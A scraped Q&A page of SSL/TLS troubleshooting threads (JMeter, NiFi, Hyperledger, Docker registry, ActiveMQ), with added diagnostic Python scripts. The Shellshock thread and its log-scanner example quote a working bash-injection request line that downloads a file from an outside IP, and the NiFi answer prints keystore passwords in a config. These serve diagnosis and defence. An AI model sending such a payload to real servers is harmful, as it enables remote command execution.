Jmeter Distributed Testing Not working with two way SSL Handshake - ssl

I have tried to do distributed testing with two servers for a request which requires two-way SSL handshaking. This is working fine when we are not using remote hosts for testing:
sh jmeter.sh -n -t sample_Load_Test/sample_test.jmx -l sample_report/Log/results.jtl -e -o sample_report/Dashboard/
Jmeter Success:
But on trying to use the remote hosts for the same jmx file, the SSL handshake is failing. I have put the same jmeter.p12 and truststore.jks on all the servers which are used for distributed testing.
Command used:
sh jmeter.sh -n -t sample_test/sample_load_test.jmx -l sample_report/Log/results.jtl -e -o sample_report/Dashboard/ -r -Jserver.rmi.ssl.disable=true
Please see the error that I am getting
Jmeter Failure:
<httpSample t="20" it="0" lt="0" ct="20" ts="1545068074631" s="false" lb="HTTP Request" rc="Non HTTP response code: javax.net.ssl.SSLHandshakeException" rm="Non HTTP response message: Received fatal alert: handshake_failure"
Does anyone know what I am doing wrong here?

I can think of 2 possible causes:
You use different JRE versions on master and slaves and they have different SSL configuration in terms of storing certificates. Make sure you use exactly the same Java runtime everywhere and that the configuration is the same.
Your test relies on client certificates and on one of the slaves you don't have them defined in the system.properties file or in the SSL Manager. Make sure to use the same JMeter version and the same set of config files and external data files on each slave.
Get used to looking into the jmeter.log and/or jmeter-server.log files - in the majority of cases you will get the reason for the failure or unexpected behavior from the log.
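A quick way to see which slave is the odd one out is to triage the merged .jtl by host before digging through each jmeter-server.log. The script below is an added example (not part of the question or answer, and not JMeter code): it parses the XML result format shown above, separates "Non HTTP response code" samples (a failed TLS handshake never yields a status line) from real HTTP statuses, and counts them per sampler host. It assumes the results were written with jmeter.save.saveservice.hostname=true so that each sample carries the hn attribute; the embedded results file, the host names slave-01/slave-02 and the two extra samples are constructed for the example. A slave that shows up only with SSLHandshakeException is the one whose javax.net.ssl.keyStore / keyStorePassword / trustStore entries in system.properties or whose .p12 and .jks files differ from a working one.

```python
import xml.etree.ElementTree as ET
from collections import Counter, defaultdict

# Constructed sample results file. The first <httpSample> is the failure quoted
# in the question; the other two are made up. The hn attribute (sampler
# hostname) is only written when jmeter.save.saveservice.hostname=true.
SAMPLE_JTL = """<testResults version="1.2">
<httpSample t="20" it="0" lt="0" ct="20" ts="1545068074631" s="false"
lb="HTTP Request" rc="Non HTTP response code:
javax.net.ssl.SSLHandshakeException" rm="Non HTTP response message:
Received fatal alert: handshake_failure" hn="slave-01"/>
<httpSample t="41" it="0" lt="40" ct="12" ts="1545068074650" s="true"
lb="HTTP Request" rc="200" rm="OK" hn="slave-02"/>
<httpSample t="18" it="0" lt="0" ct="18" ts="1545068074660" s="false"
lb="HTTP Request" rc="Non HTTP response code:
javax.net.ssl.SSLHandshakeException" rm="Non HTTP response message:
Received fatal alert: handshake_failure" hn="slave-01"/>
</testResults>
"""

NON_HTTP_PREFIX = "Non HTTP response code:"


def classify(sample):
    """Split a sample into ('transport', ExceptionClass) or ('http', status).

    JMeter reports anything that never produced an HTTP status line, such as a
    failed TLS handshake, with rc starting "Non HTTP response code:" followed
    by the Java exception class.
    """
    rc = " ".join(sample.get("rc", "").split())  # line breaks inside the attribute become spaces
    if rc.startswith(NON_HTTP_PREFIX):
        return "transport", rc[len(NON_HTTP_PREFIX):].strip()
    return "http", rc


def triage(jtl_text):
    """Count outcomes per sampler host: {host: {"kind:detail": n}}."""
    per_host = defaultdict(Counter)
    for sample in ET.fromstring(jtl_text).iter():
        if sample.tag not in ("httpSample", "sample"):
            continue
        kind, detail = classify(sample)
        per_host[sample.get("hn", "unknown")][f"{kind}:{detail}"] += 1
    return {host: dict(counts) for host, counts in per_host.items()}


def hosts_with_handshake_failures(jtl_text):
    """Hosts whose samples include a TLS handshake failure.

    If only some slaves appear here, diff their system.properties
    (javax.net.ssl.keyStore, keyStorePassword, trustStore) and the
    checksums of the .p12/.jks files against a slave that works.
    """
    report = triage(jtl_text)
    return sorted(host for host, counts in report.items()
                  if any(key.endswith("SSLHandshakeException") for key in counts))


if __name__ == "__main__":
    for host, counts in triage(SAMPLE_JTL).items():
        print(host, counts)
    print("handshake failures on:", hosts_with_handshake_failures(SAMPLE_JTL))
```

Run it against a real file with triage(open("results.jtl").read()); CSV-format .jtl files need a different reader, this one is for the XML format the question uses.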

Related

How to resolve peer unverified exception in a secure nifi cluster?

I set up a secured NiFi cluster with TLS certificates provided by the organisation. On accessing the UI I am getting the error "javax.net.ssl.SSLPeerUnverifiedException: Hostname abc.com not verified: certificate: sha256/abc/abcabc= DN: CN=abc.com, OU=Abc Operations, O=Abc Corporation Limited, C=SG subjectAltNames: [abc.com]". I have referred to the link https://nifi.apache.org/docs/nifi-docs/html/walkthroughs.html#securing-nifi-with-provided-certificates.
Is there anything I missed to enable peer to peer communication while using SSL?
I had the same problem and found the solution in the NiFi TLS-toolkit.
Note: on my cluster auth worked correctly and the problem was only in Java SSL verification.
In short: the problem is indeed in --subjectAlternativeNames.
Generating SSL keys with my own root CA did not work for me. Good instructions (but old): https://community.cloudera.com/t5/Community-Articles/How-to-create-user-generated-keys-for-securing-NiFi/ta-p/245551
CentOS Linux 8
NiFi 1.14.0
nifi-toolkit 1.15.2
My way with NiFi TLS-toolkit:
Download nifi-toolkit-*.tar.gz to a Linux machine (let's say the machine's IP is 0.0.0.1; we need it because this VM will be the "certificateAuthorityHostname"), link at this page:
sudo wget https://dlcdn.apache.org/nifi/1.15.2/nifi-toolkit-1.15.2-bin.tar.gz
Unarchive it
sudo tar -xvf nifi-toolkit-1.15.2-bin.tar.gz
Generate all keys with one long command
../security_output - this dir (or any other name) needs to be created before running the main command (it's useful to store all key files in one place)
sudo ./bin/tls-toolkit.sh standalone -h - this help command helps to better understand the args
OU - equals the VM names in my cluster
!!! --subjectAlternativeNames - it's the main reason why the error javax.net.ssl.SSLPeerUnverifiedException: Hostname <ip / dns> not verified is raised
-O - this arg overwrites your keys in the folder, be careful
generate command: sudo ./bin/tls-toolkit.sh standalone --hostnames '0.0.0.1,0.0.0.2,0.0.0.3' -c '0.0.0.1' -C 'CN=0.0.0.1,OU=nifi-prod-cluster-01' -C 'CN=0.0.0.2,OU=nifi-prod-cluster-02' -C 'CN=0.0.0.3,OU=nifi-prod-cluster-03' -O -o ../security_output --subjectAlternativeNames '0.0.0.1,0.0.0.2,0.0.0.3,nifi-prod-cluster-01,nifi-prod-cluster-02,nifi-prod-cluster-03'
After generating the keys I archive the full security_output dir:
sudo tar -zcvf security_output.tar.gz security_output
And copy this tar/dir to the other VMs of the cluster: to 0.0.0.2 and 0.0.0.3 in my example.
Then we need to move keystore.jks and truststore.jks to the nifi/conf/ directory next to nifi.properties.
Edit nifi.properties. The passwords of the keys will be in security_output/0.0.0.X/nifi.properties. I replaced only these params:
nifi.security.autoreload.enabled=false
nifi.security.autoreload.interval=10 secs
nifi.security.keystore=./conf/keystore.jks
nifi.security.keystoreType=jks
nifi.security.keystorePasswd=34dgsOBKdS+9DGHIm849ALK3JaNBdd738ddsgjfghb4J
nifi.security.keyPasswd=34dgsOBKdS+9DGHIm849ALK3Jaddsgjfghb4J
nifi.security.truststore=./conf/truststore.jks
nifi.security.truststoreType=jks
nifi.security.truststorePasswd=/n1xI9AjcwutNBdd738uOQeQL5O9ALK3i3KwylEYMW5
nifi.security.user.authorizer=single-user-authorizer
nifi.security.allow.anonymous.authentication=false
nifi.security.user.login.identity.provider=single-user-provider
nifi.security.user.jws.key.rotation.period=PT1H
nifi.security.ocsp.responder.url=
nifi.security.ocsp.responder.certificate=
Restart nifi:
sudo service nifi restart && tail -f /opt/nifi/logs/nifi-app.log
UPD. Maybe you want to set one password for the keys on all machines (it's easier to set up) or set the number of days the keys are valid: https://nifi.apache.org/docs/nifi-docs/html/toolkit-guide.html#standalone
Links:
Useful link for my guide (but old): https://pierrevillard.com/tag/tls-toolkit/
This helped me find a good idea: https://community.cloudera.com/t5/Community-Articles/Using-the-TLS-Toolkit-to-simplify-security/ta-p/247531
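The reason --subjectAlternativeNames decides the outcome is the order in which a Java client checks a certificate against the address it dialled. The script below is an added example (not NiFi, JDK or toolkit code) that models those rules on plain Python data so they can be tried without generating certificates: an IP literal in the URL is matched only against iPAddress SAN entries, a DNS name only against dNSName SAN entries, and the CN is used only as a last resort when the certificate has no dNSName SAN at all (that fallback is JSSE behaviour; OkHttp, whose "Hostname ... not verified" wording appears in the question, never consults the CN, modelled here with cn_fallback=False). The certificate summaries CERT_CN_ONLY and CERT_WITH_SAN are constructed from the three-node cluster in the answer and are hypothetical.

```python
import ipaddress


def _dns_match(hostname, pattern):
    """RFC 6125 style match: case-insensitive, one wildcard as the whole left-most label."""
    hostname = hostname.lower().rstrip(".")
    pattern = pattern.lower().rstrip(".")
    if pattern.startswith("*."):
        return "." in hostname and hostname.split(".", 1)[1] == pattern[2:]
    return hostname == pattern


def hostname_verified(hostname, san_dns=(), san_ip=(), cn=None, cn_fallback=True):
    """Return (ok, reason) the way a Java TLS client decides it.

    - IP literal in the URL: only iPAddress SAN entries count; the CN is never used.
    - DNS name: dNSName SAN entries are matched; the CN is consulted only when
      cn_fallback is True AND the certificate carries no dNSName SAN at all.
    """
    try:
        ip = ipaddress.ip_address(hostname)
    except ValueError:
        ip = None

    if ip is not None:
        for entry in san_ip:
            try:
                if ipaddress.ip_address(entry) == ip:
                    return True, f"matched iPAddress SAN {entry}"
            except ValueError:
                continue
        return False, f"no iPAddress SAN matches {hostname}"

    for entry in san_dns:
        if _dns_match(hostname, entry):
            return True, f"matched dNSName SAN {entry}"
    if san_dns:
        return False, f"no dNSName SAN matches {hostname} (CN ignored: SANs present)"
    if cn_fallback and cn and _dns_match(hostname, cn):
        return True, f"matched CN {cn} (certificate has no SAN)"
    return False, f"no SAN and CN {cn!r} does not match {hostname}"


# Constructed certificate summaries for the cluster in the answer (hypothetical;
# no real certificate is parsed). The first is what a CN-only cert looks like,
# the second what --subjectAlternativeNames with IPs and names produces.
CERT_CN_ONLY = {"cn": "nifi-prod-cluster-01"}
CERT_WITH_SAN = {
    "cn": "0.0.0.1",
    "san_dns": ("nifi-prod-cluster-01", "nifi-prod-cluster-02", "nifi-prod-cluster-03"),
    "san_ip": ("0.0.0.1", "0.0.0.2", "0.0.0.3"),
}


def check_cluster(cert, addresses):
    """For each address a node or browser might dial, would this cert be accepted?"""
    return {addr: hostname_verified(addr, **cert)[0] for addr in addresses}


if __name__ == "__main__":
    addresses = ["0.0.0.1", "nifi-prod-cluster-01", "nifi-prod-cluster-02"]
    print("CN only :", check_cluster(CERT_CN_ONLY, addresses))
    print("with SAN:", check_cluster(CERT_WITH_SAN, addresses))
```

The practical rule this encodes: put every name and every IP that any node, load balancer or browser will type into the URL into the SAN, because once a SAN is present the CN no longer rescues a mismatch, and an IP address is never rescued by it.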

Hyperledger Fabric: can't find config for root certificate

I'm trying to build a Hyperledger Fabric network for version 1.4.6. I thought I had finally gotten most of it going. I tried, from the cli image:
peer channel create -o orderer.diro.umontreal.ca:7050 -c $CHANNEL_NAME -f ./channel-artifacts/channel.tx --tls --cafile /opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/indepedent/orderer/msp/tlscacerts/tls-cert.pem
But the logs for the orderer always said that the TLS connection failed. So then I tried to change --cafile to --certfile. The file in question is a certificate, after all. And I got this:
peer channel create -o orderer.diro.umontreal.ca:7050 -c $CHANNEL_NAME -f ./channel-artifacts/channel.tx --tls --certfile /opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/indepedent/orderer/msp/tlscacerts/tls-cert.pem
Error: failed to create deliver client: failed to load config for OrdererClient: unable to load orderer.tls.rootcert.file: open : no such file or directory
I have no idea where this orderer.tls.rootcert.file setting comes from. I looked everywhere I could think of that sets a TLS root certificate for the orderer, including the fabric-ca-server-config.yaml settings file, but I still get that message. Apparently, I need to set it somewhere extra. I just don't know where. It's set in the base/peer-base.yaml file and I made sure that it now points to current values.
I'm completely out of ideas of where I can set a value that will even change this message. It's not even about giving it the right value; it's just about finding out where to set it.
The orderer container is not able to find the TLS root certificate. Check the path inside the docker container corresponding to /var/hyperledger/orderer/tls. I think this folder is empty or at least it cannot find the ca.crt inside it.
If you are using different mount paths, check in the docker-compose file for the orderer container where you are mounting the following folder inside it.
crypto-config/ordererOrganizations/example.com/orderers/orderer.example.com/tls/
The correct argument is --cafile (--certfile is for your client's certificate when using client authentication). But /opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/indepedent/orderer/msp/tlscacerts/tls-cert.pem does not seem to exist (according to your second error). Check that path inside your client (with ls, for instance). Maybe the CA certificate has not been included, maybe the file path is not correct (I don't know, "independent" instead of "indepedent"?), maybe the file name...
After checking and fixing that all, if still failing, check your orderer logs.

How can one prevent Apache executing the request line as a bash command?

I'm running several virtual hosts on Apache 2.2.22 and just noticed a rather alarming incident in the logs where a "security scanner" from Iceland was able to wget a file into a cgi-bin directory with the following http request line:
() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"
It effectively downloaded the file in question.
Could anyone explain how this request manages to actually execute the bash command?
Naturally, the cgi-bin shouldn't be writable, but it would still be helpful to understand how this type of exploit functions and whether there isn't some way to change the Apache configuration parameters so that request commands are never executed...
This may be unrelated, but several hours later a stream of strange requests from the internal interface began, occurring every 2 seconds:
host: ":443" request: "NICK netply" source ip: 127.0.0.1
This is a vulnerability in bash which is exposed via Apache, referred to as "Shellshock" or the "bash bug", and allows an attacker to execute arbitrary commands both locally and remotely, making it a very serious vulnerability.
You need to update bash, but you are showing signs of an already compromised system. For more information on shellshock including detection and fixing, see:
digitalocean.com
shellshocker.net
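To answer the "how" part of the question concretely: Apache itself never runs the request line. mod_cgi exports every request header to the CGI script's environment as HTTP_<NAME> (RFC 3875), and bash on affected versions (CVE-2014-6271) parses any environment value that starts with "() {" as a function definition and then executes the text after the closing brace. So a User-Agent or similar header containing that prologue is executed the moment bash starts for the script, before the script's own first line. The script below is an added example (not Apache or bash code, and it executes nothing): it builds the CGI environment a request would produce, flags the variables that would trigger the import bug, and scans access-log lines for the same pattern so the incident can be scoped. The log lines are constructed in combined format; the payload is the one quoted in the question, the client addresses and timestamps are made up.

```python
import re

# Bash function-import prologue that CVE-2014-6271 abuses: an environment value
# that starts with "() {" is parsed as a function body, and vulnerable bash
# versions keep executing whatever follows the closing brace.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def cgi_environment(request_line, headers):
    """Build the CGI meta-variables (RFC 3875) that mod_cgi exports to a script.

    Every request header is passed unchanged as HTTP_<NAME>, so a header value
    reaches the script's environment verbatim. If the script is bash, or calls
    anything that starts bash, the import bug fires as soon as bash starts.
    Nothing is executed here; this only shows the data path.
    """
    method, target, version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    env = {
        "REQUEST_METHOD": method,
        "SCRIPT_NAME": path,
        "QUERY_STRING": query,
        "SERVER_PROTOCOL": version,
    }
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def tainted_vars(env):
    """Environment variables whose value would trigger the bash import bug."""
    return sorted(name for name, value in env.items() if SHELLSHOCK_RE.search(value))


def scan_access_log(lines):
    """(line number, client address, payload) for each combined-format log line
    carrying the pattern, usually inside the quoted User-Agent or Referer field."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = SHELLSHOCK_RE.search(line)
        if match:
            hits.append((number, line.split(" ", 1)[0], line[match.start():].rstrip()))
    return hits


# Constructed access-log lines in Apache's combined format. The payload is the
# one quoted in the question; the client addresses and timestamps are made up.
SAMPLE_LOG = [
    '203.0.113.10 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"-" "() { :;}; /bin/bash -c \\"wget http://82.221.105.197/bash-count.txt\\""',
    '198.51.100.7 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 '
    '"-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    env = cgi_environment("GET /cgi-bin/status HTTP/1.1",
                          {"User-Agent": '() { :;}; /bin/bash -c "id"', "Host": "example.test"})
    print("tainted:", tainted_vars(env))
    for hit in scan_access_log(SAMPLE_LOG):
        print(*hit)
```

Two things this makes visible: the file landed in cgi-bin because mod_cgi runs the script with the script's directory as its working directory and wget writes to the current directory by default; and no Apache directive filters header values before they become environment variables, which is why the only real fix is the patched bash (the answer's point) and, until then, not serving CGI through bash at all.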

Docker: What is the simplest way to secure a private registry?

Our Docker images ship closed source code, so we need to store them somewhere safe, using our own private Docker registry.
We are searching for the simplest way to deploy a private Docker registry with a simple authentication layer.
I found :
this manual way http://www.activestate.com/blog/2014/01/deploying-your-own-private-docker-registry
and the shipyard/docker-private-registry docker image based on stackbrew/registry and adding basic auth via Nginx - https://github.com/shipyard/docker-private-registry
I think I will use shipyard/docker-private-registry, but is there another, better way?
I'm still learning how to run and use Docker, consider this an idea:
# Run the registry on the server, allow only localhost connection
docker run -p 127.0.0.1:5000:5000 registry
# On the client, setup ssh tunneling
ssh -N -L 5000:localhost:5000 user@server
The registry is then accessible at localhost:5000, authentication is done through ssh that you probably already know and use.
Sources:
https://blog.codecentric.de/en/2014/02/docker-registry-run-private-docker-image-repository/
https://docs.docker.com/userguide/dockerlinks/
You can also use an Nginx front-end with a Basic Auth and an SSL certificate.
Regarding the SSL certificate, I tried for a couple of hours to get a working self-signed certificate but Docker wasn't able to work with the registry. To solve this I got a free signed certificate which works perfectly. (I used StartSSL but there are others.)
Also be careful when generating the certificate. If you want to have the registry running at the URL registry.damienroch.com, you must give this URL with the sub-domain, otherwise it's not going to work.
You can perform all this setup using Docker and my nginx-proxy image (See the README on Github: https://github.com/zedtux/nginx-proxy).
This means that in case you have installed nginx using the distribution package manager, you will replace it with a containerised nginx.
Place your certificate (.crt and .key files) on your server in a folder (I'm using /etc/docker/nginx/ssl/ and the certificate names are private-registry.crt and private-registry.key)
Generate a .htpasswd file and upload it on your server (I'm using /etc/docker/nginx/htpasswd/ and the filename is accounts.htpasswd)
Create a folder where the images will be stored (I'm using /etc/docker/registry/)
Run my nginx-proxy image using docker run
Run the docker registry with some environment variables that nginx-proxy will use to configure itself.
Here is an example of the commands to run for the previous steps:
sudo docker run -d --name nginx -p 80:80 -p 443:443 -v /etc/docker/nginx/ssl/:/etc/nginx/ssl/ -v /var/run/docker.sock:/tmp/docker.sock -v /etc/docker/nginx/htpasswd/:/etc/nginx/htpasswd/ zedtux/nginx-proxy:latest
sudo docker run -d --name registry -e VIRTUAL_HOST=registry.damienroch.com -e MAX_UPLOAD_SIZE=0 -e SSL_FILENAME=private-registry -e HTPASSWD_FILENAME=accounts -e DOCKER_REGISTRY=true -v /etc/docker/registry/data/:/tmp/registry registry
The first line starts nginx and the second one the registry. It's important to do it in this order.
When both are up and running you should be able to login with:
docker login https://registry.damienroch.com
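The accounts.htpasswd file in the steps above is the whole authentication layer of this setup, so it is worth knowing exactly what goes in it. The script below is an added example (not code from the nginx-proxy image or from the docker registry) that creates and checks entries in the RFC 2307 {SSHA} scheme, which nginx's auth_basic accepts alongside crypt() and apr1 output from the htpasswd tool: base64(sha1(password + salt) + salt), standard library only, so it works on a CI host without Apache's htpasswd installed. The user names alice and ci and the passwords are constructed; the fixed salt in the test exists only to make the output reproducible.

```python
import base64
import hashlib
import hmac
import os

SCHEME = "{SSHA}"


def make_entry(user, password, salt=None):
    """One htpasswd line in the {SSHA} scheme: user:{SSHA}base64(sha1(pw+salt)+salt).

    The salt is random unless supplied (supply one only for reproducible tests).
    """
    if ":" in user:
        raise ValueError("user names cannot contain ':'")
    salt = os.urandom(8) if salt is None else salt
    digest = hashlib.sha1(password.encode("utf-8") + salt).digest()
    return f"{user}:{SCHEME}{base64.b64encode(digest + salt).decode('ascii')}"


def verify_entry(entry, user, password):
    """Check a user/password pair against one line, with a constant-time compare."""
    name, _, stored = entry.partition(":")
    if name != user or not stored.startswith(SCHEME):
        return False
    raw = base64.b64decode(stored[len(SCHEME):])
    digest, salt = raw[:20], raw[20:]   # SHA-1 digests are 20 bytes; the rest is the salt
    expected = hashlib.sha1(password.encode("utf-8") + salt).digest()
    return hmac.compare_digest(digest, expected)


def build_htpasswd(credentials):
    """Render a complete accounts file from {user: password}."""
    return "".join(make_entry(user, password) + "\n" for user, password in credentials.items())


def parse_htpasswd(text):
    """{user: line} for a file in the format nginx documents ('#' comment lines allowed)."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        entries[line.partition(":")[0]] = line
    return entries


def authenticate(htpasswd_text, user, password):
    """What nginx decides for one Authorization: Basic credential pair."""
    entry = parse_htpasswd(htpasswd_text).get(user)
    return entry is not None and verify_entry(entry, user, password)


if __name__ == "__main__":
    text = "# registry accounts\n" + build_htpasswd({"alice": "s3cret", "ci": "long-random-token"})
    print(text, end="")
    print("alice/s3cret ->", authenticate(text, "alice", "s3cret"))
    print("alice/wrong  ->", authenticate(text, "alice", "wrong"))
```

Keep in mind what this scheme is: salted, but a single fast SHA-1, and nginx offers nothing slower such as bcrypt. Treat the file accordingly: long random passwords or tokens rather than human-chosen ones, the file readable only by the nginx user, and never served over plain HTTP (the TLS front-end in this answer is what keeps the Basic credentials off the wire).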
I have created an almost ready-to-use but certainly ready-to-function setup for running a docker-registry: https://github.com/kwk/docker-registry-setup .
Maybe it helps.
Everything (Registry, Auth server, and LDAP server) is running in containers, which makes parts replaceable as soon as you're ready to. The setup is fully configured to make it easy to get started. There are even demo certificates for HTTPS but they should be replaced at some point.
If you don't want LDAP authentication but simple static authentication you can disable it in auth/config/config.yml and put in your own combination of usernames and hashed passwords.

SSL handshake with ActiveMQ server gives NullPointerException when connecting via SilverTunnel netlib

Summary
Connecting to ActiveMQ via TCP works fine with or without netlib.
Connecting via SSL works fine without netlib but fails with netlib.
Note: I'm using apache-activemq-5.6.0 and silvertunnel.org_netlib-0.14-beta.
This problem occurs whether using netlib's tcpipNetLayer or torNetLayer. However, only the tcpipNetLayer case is considered here to keep things simple.
BTW, SSL + netlib worked fine with the HornetQ messaging server (which implements SSL authentication differently) but HornetQ had problems that led me to try using ActiveMQ.
For convenience I have created a simple test case with a consumer and two different producers.
producer connects without netlib - works fine.
producer-tcpip connects with netlib using the tcpipNetLayer - the following errors occur:
With SSL debugging turned on for ActiveMQ the producer-tcpip program outputs to the console the following error message and then hangs:
ActiveMQ Transport: ssl://null:0, handling exception: java.lang.NullPointerException
This is midway through an SSL handshake because the producer-tcpip program generates the log4j message:
DEBUG org.apache.activemq.transport.failover.FailoverTransport - Attempting 0th connect to: ssl://localhost:61616
DEBUG org.apache.activemq.transport.WireFormatNegotiator - Sending: WireFormatInfo { version=9, properties={MaxFrameSize=104857600, CacheSize=1024, CacheEnabled=true, SizePrefixDisabled=false, MaxInactivityDurationInitalDelay=10000, TcpNoDelayEnabled=true, MaxInactivityDuration=30000, TightEncodingEnabled=true, StackTraceEnabled=true}, magic=[A,c,t,i,v,e,M,Q]}
Then when the producer-tcpip program is killed (e.g. with a ctrl+C) then the activemq.log reports that:
WARN | Transport Connection to: tcp://127.0.0.1:49463 failed: javax.net.ssl.SSLHandshakeException: Remote host closed connection during handshake | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: ssl:///127.0.0.1:49463
ERROR | Could not accept connection from tcp://127.0.0.1:49463: javax.net.ssl.SSLHandshakeException: Remote host closed connection during handshake | org.apache.activemq.broker.TransportConnector | ActiveMQ Task-3
I have no idea what could be causing this or how it can be resolved. Can anyone help?
Steps to reproduce the problem (takes under 15 minutes):
download the test case
wget http://anandavala.info/miscl/testing-AMQ-Netlib-SSL.zip
unzip testing-AMQ-Netlib-SSL.zip
rm testing-AMQ-Netlib-SSL.zip
cd testing-AMQ-Netlib-SSL
Download latest ActiveMQ into the testing directory
wget https://www.apache.org/dist/activemq/apache-activemq/5.6.0/apache-activemq-5.6.0-bin.tar.gz
tar -xzf apache-activemq-5.6.0-bin.tar.gz
rm apache-activemq-5.6.0-bin.tar.gz
Edit conf/activemq.xml to accept ssl
gedit apache-activemq-5.6.0/conf/activemq.xml
replace the transportConnectors entry with the following lines (to enable SSL)
<transportConnectors>
    <transportConnector name="ssl" uri="ssl://0.0.0.0:61616?needClientAuth=true"/>
</transportConnectors>
<sslContext>
    <sslContext keyStore="broker.ks" keyStorePassword="password"
                trustStore="client.ks" trustStorePassword="password"/>
</sslContext>
start server
cd apache-activemq-5.6.0
bin/activemq start
view logging output
tail -f data/activemq.log
open another console then cd into the testing-AMQ-Netlib-SSL directory
Download latest SilverTunnel netlib into the testing directory
wget http://sourceforge.net/projects/silvertunnel/files/silvertunnel_Netlib/silvertunnel.org_netlib-0.14-beta.zip
unzip silvertunnel.org_netlib-0.14-beta.zip
rm silvertunnel.org_netlib-0.14-beta.zip
compile the source code into three runnable jar files in separate directories
ant
run the consumer
cd consumer
./consumer
open another console then cd into the testing-AMQ-Netlib-SSL/producer directory
run the producer
./producer
let it run for a bit to satisfy yourself that it works then kill the producer by hitting ctrl+C
run the producer-tcpip
cd ../producer-tcpip
./producer-tcpip
let it run for a bit to satisfy yourself that it has stalled at a NullPointerException then kill the producer-tcpip by hitting ctrl+C
notice the debug message in producer-tcpip's output
tail -f logs/output.log
also notice the error message that appears at the bottom of activemq.log (see the tail output from the first console window) or type at the current prompt
tail -f ../apache-activemq-5.6.0/data/activemq.log
Thanks for your help!